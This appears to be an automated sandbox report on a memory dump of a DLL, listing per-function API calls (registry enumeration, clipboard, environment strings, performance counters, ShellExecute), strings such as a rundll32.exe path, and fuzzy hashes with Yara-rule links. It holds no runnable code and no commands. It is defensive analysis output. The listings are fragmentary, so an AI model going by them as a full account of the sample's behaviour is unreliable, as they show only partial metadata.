std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B44EB
__Getctype.LIBCPMT ref: 6E4B4587
std::_Facet_Register.LIBCPMT ref: 6E4B45A6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B45C6

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 2f014ccb264958143546f7653842fa2993352a5a9829f976e3cab554c34127c2
Instruction ID: eabf5acada195ae1755acc6a4a45e7ad6618454f43970e32b1bde8e55d5cdfe5
Opcode Fuzzy Hash: 2f014ccb264958143546f7653842fa2993352a5a9829f976e3cab554c34127c2
Instruction Fuzzy Hash: A151C175D046048FCB10CFA8C440E9EB7B8EB45B54F11456FD909AB381EB30EA46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BE530, Relevance: 9.1, APIs: 6, Instructions: 121registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6E4BE440: GetModuleHandleW.KERNEL32(Advapi32.dll,2B098C7C), ref: 6E4BE494
Part of subcall function 6E4BE440: RegCloseKey.ADVAPI32(00000000), ref: 6E4BE4F3

RegCloseKey.ADVAPI32(?,?,?), ref: 6E4BE592
RegEnumKeyExW.ADVAPI32 ref: 6E4BE5DA
RegEnumKeyExW.ADVAPI32 ref: 6E4BE613
RegCloseKey.ADVAPI32(?), ref: 6E4BE628
RegCloseKey.ADVAPI32(?), ref: 6E4BE650
RegCloseKey.ADVAPI32(?), ref: 6E4BE678

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Enum$HandleModule
String ID:
API String ID: 2852649468-0
Opcode ID: 5005c32bc91dd442189a4a5ec41595220e6b8283d74bd73b102eea0e30f3baef
Instruction ID: d1488bedbb4f48c357a66d412163a36099b9bec9f77e15677eb143d0da1fb9f8
Opcode Fuzzy Hash: 5005c32bc91dd442189a4a5ec41595220e6b8283d74bd73b102eea0e30f3baef
Instruction Fuzzy Hash: E1413C722043059BD724DFA5D894FABB7E8EBC8354F40496EF999D7240DB31E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4CB2A1, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E4C92CF,6E4C4EA0,6E4C5531,?,6E4C574E,?,00000001,?,?,00000001,?,6E4FCC28,0000000C,6E4C5842), ref: 6E4CB2AF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4CB2BD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4CB2D6
SetLastError.KERNEL32(00000000,6E4C574E,?,00000001,?,?,00000001,?,6E4FCC28,0000000C,6E4C5842,?,00000001,?), ref: 6E4CB328

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 65d6d8f2c59113a162b974bd59c8dcfa5d39390f6429eb341d34f920fb5935e4
Instruction ID: d03e85962b14682484ef819ad18c581b39a4cc9a2993b5cc37417fdb59173460
Opcode Fuzzy Hash: 65d6d8f2c59113a162b974bd59c8dcfa5d39390f6429eb341d34f920fb5935e4
Instruction Fuzzy Hash: AF01283A11DB125FE76025F57C94E6A2758EB43E79B200A2FE6244B7F8FF5188128186

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B91C0, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E4B9563
_com_issue_error.COMSUPP ref: 6E4B956D
_com_issue_error.COMSUPP ref: 6E4B9577
_com_issue_error.COMSUPP ref: 6E4B957D
_com_issue_error.COMSUPP ref: 6E4B9587
_com_issue_error.COMSUPP ref: 6E4B9591

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error
String ID:
API String ID: 2162355165-0
Opcode ID: f2920c8541703dd0553c4fbdd221b2e0a96704de7a2b110ca1728af1c6b03f3b
Instruction ID: 501804136200c44c8105e71cac2d6e3300df96488fb4de8b80a30940bc0c6885
Opcode Fuzzy Hash: f2920c8541703dd0553c4fbdd221b2e0a96704de7a2b110ca1728af1c6b03f3b
Instruction Fuzzy Hash: 0CF096F960018DAEE7019FF59800F9B77ACEB44A18F10052EAE1477244C7303500C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1390, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 6E4BBC70: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,2B098C7C,00000000,?), ref: 6E4BBCDE

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6E4C13E7
PdhRemoveCounter.PDH(?,?,00000000), ref: 6E4C1483
PdhCloseQuery.PDH(?,?,00000000), ref: 6E4C1498

Strings

0, xrefs: 6E4C1547
edit, xrefs: 6E4C13E0

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: 3b5d95bccbdca90cac92b45cc71c1f985010bfd9aa45a14b479bc01a954939b2
Instruction ID: 566ae36f940f82b83a1fbf02decabbbfef38bacfab55b92ae843fa17fe2dc77a
Opcode Fuzzy Hash: 3b5d95bccbdca90cac92b45cc71c1f985010bfd9aa45a14b479bc01a954939b2
Instruction Fuzzy Hash: 8DA1FF756003058BD704DFB8C890F9AB7B5BF85758F104A1EE9958B391D732E988CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DD00E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4DD196

Strings

*?, xrefs: 6E4DD04F
., xrefs: 6E4DD39F

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction ID: 2d9f1affd9c415a9ea73942e35258f024b7c1cbfd4661e45a4d9f799c7af0e60
Opcode Fuzzy Hash: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction Fuzzy Hash: 61614976E00209AFDB05CFE8C8908EDFBF9EF48314B2446AAD845E7304D771AA458F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5D90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91threadclipboardCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5E04
SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4B5E74
GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E4B5E93
GetACP.KERNEL32(00000000,?,?,?), ref: 6E4B5EA4

Strings

e, xrefs: 6E4B5DAF

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardOpenSwitchThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: e
API String ID: 1567280528-4024072794
Opcode ID: 0c48fca8010fe926671e7669cae04c5866d9ea2c2c6755691fc654321ac65ba4
Instruction ID: 7cc222c5c0ab3a0278012bdd9595327f78e2021c3ccd36ce4769ae1755c9c95b
Opcode Fuzzy Hash: 0c48fca8010fe926671e7669cae04c5866d9ea2c2c6755691fc654321ac65ba4
Instruction Fuzzy Hash: 0131D4319147058FC302DF7A944491AF7EAAFDE385F148B2EF441F3151EB34A899CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C1C00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6E4C1C2A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6E4C1C3E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6E4C1C52

Strings

Performance Monitor - (Reload Configuration), xrefs: 6E4C1C2C
Performance Monitor - (Edit Configuration), xrefs: 6E4C1C40

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: fd64612af3ee9eaa136708ecffc7de0e0240d725e279809cee489acb7d9fd4dd
Instruction ID: 82db010a983bf158c86cbc0ac688285e6d29c571c857dfee9f380b816d0fdc68
Opcode Fuzzy Hash: fd64612af3ee9eaa136708ecffc7de0e0240d725e279809cee489acb7d9fd4dd
Instruction Fuzzy Hash: E1F0B43325025DBBEB01DE959C80FBB7B6DEB8CB10F044017FB149A181C371A9229BB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DED2F, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e3fd18376e899175cae0d0e3de09989845ab6b538eddcb77e999e999c8d39f
Instruction ID: 191d756521bb8d21d49b4b9478c780fa827b1e11633776b5607bc61e3ced0bc1
Opcode Fuzzy Hash: 50e3fd18376e899175cae0d0e3de09989845ab6b538eddcb77e999e999c8d39f
Instruction Fuzzy Hash: E1719031D20217AFDB119EF5C8E4EAEFB79EF41350B14062FE42457284DB70994ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DB9B3, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

_free.LIBCMT ref: 6E4DBABE
_free.LIBCMT ref: 6E4DBAD5
_free.LIBCMT ref: 6E4DBAF4
_free.LIBCMT ref: 6E4DBB0F
_free.LIBCMT ref: 6E4DBB26

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 6b4fcd1409748fd5f6fcb60cfc9fd6ba2a6f174908be3bcb320a42559c3dbdfd
Instruction ID: 4a72c9dad6909f48fba6479ce72945bee031fc7d12aacd0688187bbc58f9fe53
Opcode Fuzzy Hash: 6b4fcd1409748fd5f6fcb60cfc9fd6ba2a6f174908be3bcb320a42559c3dbdfd
Instruction Fuzzy Hash: E651BF31A00705AFDB10DFB9C860EAA77F8EF49724B40456EE909DB758E771D909CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C4260, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,2B098C7C,?,?,00000000,6E4E9E9B,000000FF,?,6E4C15EF,00000000), ref: 6E4C42B3
PdhCloseQuery.PDH(?,2B098C7C,?,?,00000000,6E4E9E9B,000000FF,?,6E4C15EF,00000000), ref: 6E4C42DE
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6E4C4302
PdhValidatePathW.PDH(?), ref: 6E4C435E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6E4C438A

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: 659836bedaa6f0e482639fa5dda7a1a1aed063c429a66a9653f9bed779cfa3cc
Instruction ID: 4d050971d5cd6973050906e4b9c1bc822838115c06923ad374a35e17404e6952
Opcode Fuzzy Hash: 659836bedaa6f0e482639fa5dda7a1a1aed063c429a66a9653f9bed779cfa3cc
Instruction Fuzzy Hash: D8510375900259AFDB20CF64CD44FDAB3B8FF44744F10819AE558AB250D774AAC2CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D70FB, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4D716D
_free.LIBCMT ref: 6E4D718D

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dd096ce54f5f395a2aaf822f62051fcd7314aa9f657bc2ffb644203b9a9924f8
Instruction ID: aa8338b34dc097d14781cf1b71b68df17a9a401fd0388751a800dd9c61bb32e8
Opcode Fuzzy Hash: dd096ce54f5f395a2aaf822f62051fcd7314aa9f657bc2ffb644203b9a9924f8
Instruction Fuzzy Hash: 3E410632A042009FDB14DFB8C8A4E9DB7F5EF85718F1146AED915EB381DB31A905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B4C40, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4C9E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4CBE
std::_Facet_Register.LIBCPMT ref: 6E4B4D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4DAF

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 680210b4547f3577e4ba2cb71f35722f1c0053f6e98912e8c66c16b60ca20bf3
Instruction ID: 3bf2cdfbe54e5494db4793390338356580c2d3686570931b98f4369ddaab6508
Opcode Fuzzy Hash: 680210b4547f3577e4ba2cb71f35722f1c0053f6e98912e8c66c16b60ca20bf3
Instruction Fuzzy Hash: 1551BD709142158FCB11CFE8C540F9EB7B8EF45B98F11455EE806AB380EB74AA46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B4AE0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4B16
std::_Lockit::_Lockit.LIBCPMT ref: 6E4B4B36
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4B56
std::_Facet_Register.LIBCPMT ref: 6E4B4BF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B4C13

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 576a2df60622d15e78aad1aee1acbe9d3498e5030de784acba81300e2747b178
Instruction ID: 0d1704c883db67aa317f58a677db0a284490324dd4b39542924304c5b920feac
Opcode Fuzzy Hash: 576a2df60622d15e78aad1aee1acbe9d3498e5030de784acba81300e2747b178
Instruction Fuzzy Hash: 8B41B2719082158FCB11CFE4C580F9EB7B4EB44B58F11455FD906AB341EB75A906CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DDD03, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E4DDD0C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E4DDD2F

Part of subcall function 6E4D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E4C8F9C,00000105,000000FF,FFFFFFFF,00000000,?,6E4B1687,?,00000103,000000FF), ref: 6E4D9C04

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E4DDD55
_free.LIBCMT ref: 6E4DDD68
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E4DDD77

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 7ccf21db3c44c4df23971330c07d9871f1a4db8541b2e6aad0c4419111699860
Instruction ID: fee04bfae6e054e616b7312a90d715079ed783329323d94cfc5ec6573b0993e7
Opcode Fuzzy Hash: 7ccf21db3c44c4df23971330c07d9871f1a4db8541b2e6aad0c4419111699860
Instruction Fuzzy Hash: B0018872601B1A7F2B2115FA5C6CE7B696DEEC3EA4311026EF914C3245DB619C058DB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA3E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6E4D6995,?,6E4D642D,6E4D9BBE,6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4DA3E7
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E4D731A,000000FF,000000FF), ref: 6E4DA40D
_free.LIBCMT ref: 6E4DA44D
_free.LIBCMT ref: 6E4DA480
SetLastError.KERNEL32(00000000,000000FF), ref: 6E4DA48D

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 5786d971fd808bd114bfe812c1a45fb544eadb1f6453b3b554b09c13cd1ff919
Instruction ID: 6a618d19a2465ab0c7b9b8ec360a2eb100ca1040e63e5757b367f6125762dcc0
Opcode Fuzzy Hash: 5786d971fd808bd114bfe812c1a45fb544eadb1f6453b3b554b09c13cd1ff919
Instruction Fuzzy Hash: 5611E932240A016BD65226F6BDB8E6A275DAFC3668724061BF529923C5EF31D90D6160

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C8508, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6E4C3342), ref: 6E4C850D
HeapAlloc.KERNEL32(00000000), ref: 6E4C8514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E4C855A
HeapFree.KERNEL32(00000000), ref: 6E4C8561

Part of subcall function 6E4C83A7: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E4C8550,00000000), ref: 6E4C83CB
Part of subcall function 6E4C83A7: HeapAlloc.KERNEL32(00000000), ref: 6E4C83D2

Strings

;\Ln, xrefs: 6E4C8541

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID: ;\Ln
API String ID: 1864747095-2500737854
Opcode ID: 1d1449b290b1cdad65a51007edf0d4227c5f570630ea3483b29066c0618f079e
Instruction ID: c738d13c77ea56dce5d434040f7ffb416eb644c18bd36eed8b221e25d2431b33
Opcode Fuzzy Hash: 1d1449b290b1cdad65a51007edf0d4227c5f570630ea3483b29066c0618f079e
Instruction Fuzzy Hash: ABF0B47A544B125BCB652BF8B80CD5B6A69AFC6FA1701442EF545C7248DF70E4028792

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E4978, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4E4990

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4E49A2
_free.LIBCMT ref: 6E4E49B4
_free.LIBCMT ref: 6E4E49C6
_free.LIBCMT ref: 6E4E49D8

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fc9002d02bf4d3f75aef57f951a7c5408850a5af16551be8314a0ce14083bd14
Instruction ID: 0a1c9e766d3f812b273c5ba7b426df089d7fd68fe060f104620e12fccde92578
Opcode Fuzzy Hash: fc9002d02bf4d3f75aef57f951a7c5408850a5af16551be8314a0ce14083bd14
Instruction Fuzzy Hash: 17F06231411B09AB8A60EAF4F4A0C8733DDBA417517A14C0FF15AE7A00C731F891C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D6AD4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E4D6B17, 6E4D6B1E, 6E4D6B52

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 340f63ee3369796568b372427b1f3974afaa6975e46a506d62c2bbb267e2710c
Instruction ID: e470e57d6c8a15d1d39c382b96d2925b7434c662f62ee58046df01ed8bbe4c17
Opcode Fuzzy Hash: 340f63ee3369796568b372427b1f3974afaa6975e46a506d62c2bbb267e2710c
Instruction Fuzzy Hash: 9641A471A20615AFCB11DFE9C9A0DDEBBFCEB85714B10009BE404D7300D7B19A49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B17B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B17DD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E4B182C

Part of subcall function 6E4C60DA: _Yarn.LIBCPMT ref: 6E4C60F9
Part of subcall function 6E4C60DA: _Yarn.LIBCPMT ref: 6E4C611D

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B185E

Strings

bad locale name, xrefs: 6E4B1848

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
